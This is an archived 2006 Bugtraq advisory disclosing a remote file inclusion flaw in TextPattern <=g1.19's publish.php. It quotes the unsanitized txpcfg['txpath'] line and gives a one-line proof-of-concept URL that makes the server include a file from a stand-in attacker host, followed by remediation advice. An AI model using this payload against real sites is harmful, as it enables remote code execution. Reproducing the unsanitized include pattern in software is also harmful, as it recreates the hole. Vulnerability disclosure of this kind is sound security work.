lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20061027002652.8137.qmail@securityfocus.com>
Date: 27 Oct 2006 00:26:52 -0000
From: Bithedz@...il.com
To: bugtraq@...urityfocus.com
Subject: TextPattern <=1.19  Remote File Inclusion Vulnerability

----------------------------------------------------------------------------
TextPattern <=g1.19 (txpcfg[txpath]) Remote File Inclusion Vulnerability
----------------------------------------------------------------------------

Author		: Zeni Susanto A.K.A Bithedz
Date Found	: October, 25th 2006
Location	: Indonesia,Bandung
Critical Lvl	: Highly critical
Impact		: System access
Where		: From Remote
---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~

Application	: TextPattern
version		: <=g1.19
URL		: http://textpattern.com/deanload/textpattern_g119.zip

textpattern is A free, flexible, elegant, easy-to-use content management system for all kinds of websites, even weblogs.


---------------------------------------------------------------------------

Vulnerability:
~~~~~~~~~~~

In file publish.php I found vulnerability script
--------------------------publish.php---------------------------------------
define("txpath",$txpcfg['txpath']); 
----------------------------------------------------------------------------

Input passed to the "txpcfg['txpath']" parameter in publish.php is not
properly verified before being used. This can be exploited to execute
arbitrary PHP code by including files from local or external
resources.


Proof Of Concept:
~~~~~~~~~~~~
http://yourtargetsite/[textpattern_g119_path]/textpattern/publish.php?txpcfg[txpath]=http://attact/colok.txt?
Solution:
~~~~
- Sanitize variable $txpcfg['txpath'] on affected files.
- Turn off register_globals

---------------------------------------------------------------------------

Shoutz:
~
~ K-159
~ Monik My Brain
~ #bridge (silent) @irc.dal.net
------------------------------------------------------------------------
---
Contact:
~
bithedz[at]gmail[dot]com

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ